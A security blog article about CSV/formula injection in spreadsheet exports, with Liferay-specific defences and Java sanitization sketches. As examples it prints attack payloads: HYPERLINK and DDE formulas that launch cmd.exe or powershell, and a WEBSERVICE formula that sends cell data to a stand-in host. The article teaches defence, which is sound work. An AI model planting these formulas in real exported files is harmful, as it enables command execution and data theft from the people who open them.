
Beware of formulas: Comma Separated Victims

Defense strategies against CSV Injection attacks

Simone Cinti
Software Architect
liferay, security, formula, excel, csv, injection, attack, and vulnerability

Introduction

How many times have you had to deal with a CSV export plugin?

Many, I guess.

And are you aware of the risks of underestimating vulnerabilities that could expose your application to a Remote Command Execution or a Data Breach attack?

If you have never heard of a CSV Injection or Formula Injection attack before, this article is for you.

In my previous article on the SMC Techblog, I showed how injection attacks can pose a serious risk to your data security, and how to prevent them with Liferay.

I suggest reading it first (Injection - how to prevent with Liferay) to better understand the topics covered here; however, if you are already aware of the pitfalls behind this kind of attack and of the defense strategies against it, you won't find it difficult to continue reading.

In this article I'll explain what CSV Injection (or Formula Injection) attacks are, the possible countermeasures to neutralize them, and what the Liferay framework APIs can do to safely encode values when exporting in CSV format.

The input validation problem

As you know, the first rule for preventing injection is input validation: rejecting any input that contains characters useful to the attacker. Unfortunately, it is not always easy to find a regular expression that filters out all the undesired characters without excluding those we really need. An example is the apostrophe character " ' ", which is often needed in first-name or last-name fields in some countries, but which we would like to exclude because it is also an attribute delimiter in HTML and a string delimiter in SQL.

So it is essential to have a robust input validation mechanism: this is the first rule of defense against injection attacks and is also the only way to prevent them.
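To make the apostrophe dilemma concrete, here is a minimal sketch of an allowlist check for a name field. The class name NameValidator, the 100-character limit and the regular expression itself are assumptions made for illustration only; they are not part of Liferay or of any standard.

```java
import java.util.regex.Pattern;

final class NameValidator {

    // Hypothetical allowlist: runs of Unicode letters, optionally separated
    // by a single space, apostrophe or hyphen (e.g. "D'Angelo", "Anna Maria").
    private static final Pattern NAME =
        Pattern.compile("\\p{L}+(?:[ '\\-]\\p{L}+)*");

    // Returns true only when the whole value matches the allowlist.
    static boolean isValidName(String value) {
        return value != null
            && value.length() <= 100 // arbitrary limit, chosen for the example
            && NAME.matcher(value).matches();
    }

    public static void main(String[] args) {
        System.out.println(isValidName("D'Angelo"));         // legitimate apostrophe
        System.out.println(isValidName("=HYPERLINK(\"x\")")); // formula-like input
        System.out.println(isValidName("' OR '1'='1"));       // SQL-like input
    }
}
```

An allowlist like this keeps the apostrophe only where it sits between letters. It works for short, well-structured fields; for free-text fields it quickly becomes too restrictive.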

It would be wise not to forget the second rule of defense against injection attacks: neutralization by output sanitization or output escaping.

Despite all this, we may be completely unaware of the risks of lacking a valid encoding mechanism for the values in exported cells, and all our care about output sanitization can be forgotten when we are developing our own custom CSV export plugin.

Nothing more dangerous...

In order to effectively show you the risks, let's now focus on the most difficult input field to validate: the notes field. In a multiline notes field we often allow space characters, currency symbols, and also the "%" symbol or other special characters.

But in the common case we neither validate nor escape the values of exported cells, because we are often unaware of the pitfalls behind certain character sequences when they are loaded into a spreadsheet.

In the most widespread spreadsheet applications, such as Microsoft Excel or LibreOffice Calc, some formulas can become a security issue.

For instance, if we inject the following sequence into an input field:

=HYPERLINK("C:\Windows\System32\cmd.exe";"Click me")

the exported CSV will include that hyperlink in the corresponding cell, so when the user clicks it, the specified command or application will be executed (albeit after a confirmation prompt).

The example above will launch the command prompt on the victim's machine; in this way the attacker exploits a Formula Injection in order to get a Remote Command Execution or, more appropriately, an OS Command Injection.

Scary, isn't it?

We can avoid it through input validation with a regular expression, but please note that the spreadsheet will also accept the URL-encoded form, as follows:

=HYPERLINK("C%3A%5Cwindows%5Csystem32%5Ccmd.exe")

This is why it can be tricky to protect against this kind of attack when characters such as the percent sign, the equals sign, or parentheses are needed and must be accepted as valid input to meet the users' needs.
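The URL-encoded bypass can be illustrated with a small sketch. Assume a hypothetical deny rule that rejects values containing a Windows drive path: the encoded payload slips through unless the value is percent-decoded before the check. The class and method names are illustrative only.

```java
import java.io.UnsupportedEncodingException;
import java.net.URLDecoder;
import java.util.regex.Pattern;

final class EncodedPayloadCheck {

    // Hypothetical deny rule: a drive letter followed by ":\" (e.g. C:\).
    private static final Pattern DRIVE_PATH = Pattern.compile("[A-Za-z]:\\\\");

    static boolean looksLikeDrivePath(String value) {
        return DRIVE_PATH.matcher(value).find();
    }

    // Percent-decodes the value. Input that is not valid percent-encoding
    // (for instance a note such as "50% off") is returned unchanged.
    // Note: URLDecoder also turns '+' into a space.
    static String percentDecode(String value) {
        try {
            return URLDecoder.decode(value, "UTF-8");
        } catch (UnsupportedEncodingException | IllegalArgumentException e) {
            return value;
        }
    }

    public static void main(String[] args) {
        String raw = "=HYPERLINK(\"C%3A%5Cwindows%5Csystem32%5Ccmd.exe\")";
        System.out.println(looksLikeDrivePath(raw));                // check on the raw value
        System.out.println(looksLikeDrivePath(percentDecode(raw))); // check after decoding
    }
}
```

The first check misses the payload and the second one catches it. Every extra encoding the spreadsheet accepts is one more form the validator has to anticipate, which is why validation alone is fragile here.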

Luckily, the HYPERLINK formula in spreadsheets does not support additional command parameters; if it did, an attacker could trigger an immediate Windows shutdown by injecting the following command:

C:\Windows\System32\cmd.exe /C "shutdown /p"

However, the execution of other kinds of scripts is allowed, such as a .vbs (VBScript) or a .bat (batch) file, when the spreadsheet application is running on Microsoft Windows.

Whenever the victim uses an older version of Microsoft Excel, or a newer one with the Dynamic Data Exchange service enabled, they could expose the entire system to serious risk, for instance when the following formula is executed:

=cmd|'/K powershell ssh ...omitted...'!A0

Formula Injection attacks are a stepping stone to other dangerous threats, such as OS command execution, which unexpectedly runs a command, a script, or any other executable on the victim's machine.

Besides hyperlinks, an attacker can also trigger a call to a malicious service using the WEBSERVICE formula.

For instance, an attacker can inject a formula that invokes a remote web service in order to obtain the content of other cells in the exported CSV. The attacker performs the formula injection by typing it into a form input field, so the value is permanently stored in the application database. Later, a user who requests a data export gets a CSV containing that dangerous value in some cell. The user who receives and opens the CSV file, completely unaware, may then accidentally perform an HTTP request to the malicious service:

=WEBSERVICE(CONCAT("http://service.malware?d="; C6&","&C7&","&C8))

sending the content of one or more data cells via a GET parameter and becoming the victim of a Data Breach attack through Formula Injection (in the example above, the values of cells C6, C7 and C8 are joined and sent together in the "d" parameter).

The Liferay API for CSV encoding

The CSVUtil class exposes two public static methods:

encode(Object object)
encode(String s)

The first method converts the object to a string (merging the elements in the case of arrays) and then calls the second.

The String version of encode can be useful to avoid issues with double quotes, the delimiter token, or any other symbol that can interfere when importing or parsing the CSV file.

Although it is useful, be careful: the encode() method will not help you neutralize Formula Injection attacks in any way.
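To see why delimiter and quote escaping alone is not enough, consider the following sketch of generic CSV quoting. It is NOT the CSVUtil implementation: the CsvQuoting class and its quote method are hypothetical stand-ins that follow the usual CSV convention (wrap the value in double quotes when needed and double any embedded quote), with a comma assumed as the delimiter.

```java
final class CsvQuoting {

    // Generic CSV quoting, written for illustration only.
    // This is an assumption about typical CSV escaping, not Liferay code.
    static String quote(String value) {
        boolean needsQuotes = value.indexOf(',') >= 0
            || value.indexOf('"') >= 0
            || value.indexOf('\n') >= 0
            || value.indexOf('\r') >= 0;

        if (!needsQuotes) {
            return value;
        }

        // Double every embedded quote and wrap the whole value in quotes.
        return '"' + value.replace("\"", "\"\"") + '"';
    }

    public static void main(String[] args) {
        // The leading "=" survives the escaping in both cases.
        System.out.println(quote("=SUM(1+1)"));
        System.out.println(quote("=HYPERLINK(\"x\")"));
    }
}
```

The escaping keeps the CSV structure intact, but the cell content still begins with "=", so a spreadsheet would still treat it as a formula.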

Liferay, which cares about your security, has just released a security patch, CST-7058, for Liferay Portal 7.0 CE, but it only gives you a way to disable CSV export for the Forms and Dynamic Data Lists components. As the CST-7058 note also states:

This patch does not "solve" the CSV injection issue since the issue can only be fixed by the spreadsheet program (i.e., this is not a security vulnerability in Liferay Portal). With this patch, administrators will have the ability to disable CSV export for DDL and Form. Administrators can also present a warning about CSV injection to users before the CSV file is exported.

How to neutralize the Formula Injection attacks

Well, you are now probably wondering which defense strategies can neutralize this kind of attack.

According to OWASP, to neutralize CSV Injection or Formula Injection attacks you only have to ensure that no cell begins with any of the following symbols:

  • = (equal)
  • + (plus)
  • - (minus)
  • @ (at)

In this way we prevent spreadsheet formulas from being injected as values into the exported CSV cells.

Another solution is to prefix an apostrophe " ' " to each cell value starting with any of the symbols above.

This, of course, cannot protect us from users who delete the apostrophe prefix, leaving the injected formula ready to be (unintentionally?) executed. In that case we can plan other sanitization strategies to protect the most proactive users from themselves.

We also suggest applying the sanitization rule regardless of the presence of one or more double quotes at the beginning of the string. That's because the following value:

"=SUM(1+1)"

will be parsed as a valid formula by the spreadsheet (when loaded from a CSV file) and so it could be unintentionally executed by the user.
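The apostrophe rule, including the leading double quotes case, could be sketched as follows. FormulaNeutralizer and neutralize are hypothetical names chosen for this example; the trigger set is the list of four symbols given above.

```java
final class FormulaNeutralizer {

    // The four trigger symbols listed above.
    private static final String TRIGGERS = "=+-@";

    // Prefixes an apostrophe when the first character after any leading
    // double quotes is one of the trigger symbols.
    static String neutralize(String value) {
        if (value == null || value.isEmpty()) {
            return value;
        }

        // Skip any leading double quotes, so "=SUM(1+1)" is caught too.
        int i = 0;
        while (i < value.length() && value.charAt(i) == '"') {
            i++;
        }

        if (i < value.length() && TRIGGERS.indexOf(value.charAt(i)) >= 0) {
            return "'" + value;
        }

        return value;
    }

    public static void main(String[] args) {
        System.out.println(neutralize("=SUM(1+1)"));
        System.out.println(neutralize("\"=SUM(1+1)\""));
        System.out.println(neutralize("plain text"));
    }
}
```

One trade-off to keep in mind: legitimate values such as the negative number -5 also get the apostrophe prefix, so numeric columns may need a separate, stricter check instead of this generic rule.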

Conclusions

Formula Injection attacks can be very dangerous, and they unfold in several phases:

  • Phase 1: the attacker injects the malicious formula into one or more form input fields, and it is permanently stored in the application database.

  • Phase 2: a user asks the application for a CSV export. The exported form data includes the poisoned field value containing the previously injected malicious formula.

  • Phase 3: the same user, or another user who receives the exported CSV, opens it with a spreadsheet application such as LibreOffice Calc or Microsoft Excel, and may unintentionally click the injected malicious hyperlink or execute a formula. This is the phase in which the real attack takes place because, as you can guess, a Formula Injection can be exploited to mount a more dangerous attack such as Remote Command Execution or a Data Breach: executing an operating system command, a script, or an executable that can damage the host, or opening connections to remote endpoints chosen by the attacker in order to steal sensitive or private data.

Unlike XSS attacks, these attacks act silently, with a long delay after the injection, and they can be hard to detect.

As with XSS attacks, however, we can use similar countermeasures:

  • preventing the attack by validating untrusted input values, discarding those that contain illegal character sequences

  • neutralizing the attack by sanitizing the values or, when possible, by prefixing them with an apostrophe, for each value starting with one of the following symbols, regardless of the presence of one or more leading double quotes:

    • = (equal)
    • + (plus)
    • - (minus)
    • @ (at)
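In a custom export plugin the two output steps have to be applied in the right order: first neutralize the formula, then escape the value for CSV. The sketch below shows one way to do that for a whole row. SafeCsvRow, cell and row are hypothetical names, and the comma delimiter is an assumption; adapt it to the delimiter your export really uses.

```java
import java.util.Arrays;
import java.util.List;
import java.util.stream.Collectors;

final class SafeCsvRow {

    // Neutralizes a single cell and then escapes it for CSV.
    static String cell(String raw) {
        String value = (raw == null) ? "" : raw;

        // Step 1: apostrophe prefix for values that start with = + - @,
        // ignoring any leading double quotes.
        int i = 0;
        while (i < value.length() && value.charAt(i) == '"') {
            i++;
        }
        if (i < value.length() && "=+-@".indexOf(value.charAt(i)) >= 0) {
            value = "'" + value;
        }

        // Step 2: generic CSV quoting (assumed comma delimiter).
        boolean needsQuotes = value.chars()
            .anyMatch(c -> c == ',' || c == '"' || c == '\n' || c == '\r');
        if (needsQuotes) {
            value = "\"" + value.replace("\"", "\"\"") + "\"";
        }

        return value;
    }

    // Builds one CSV line from the raw cell values.
    static String row(List<String> cells) {
        return cells.stream()
            .map(SafeCsvRow::cell)
            .collect(Collectors.joining(","));
    }

    public static void main(String[] args) {
        System.out.println(row(Arrays.asList("Mario", "=SUM(1+1)", "a,b")));
    }
}
```

Doing the neutralization before the quoting means the apostrophe ends up inside the quoted cell, right in front of the formula, which is where the spreadsheet expects it.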

So pay attention when developing custom CSV export plugins, apply all the tips described above, and stay tuned to the SMC Techblog's Liferay channel.


written by
Simone Cinti
Software Architect
Software Architect for SMC, he's involved in the design and development of Liferay Portal based solutions.
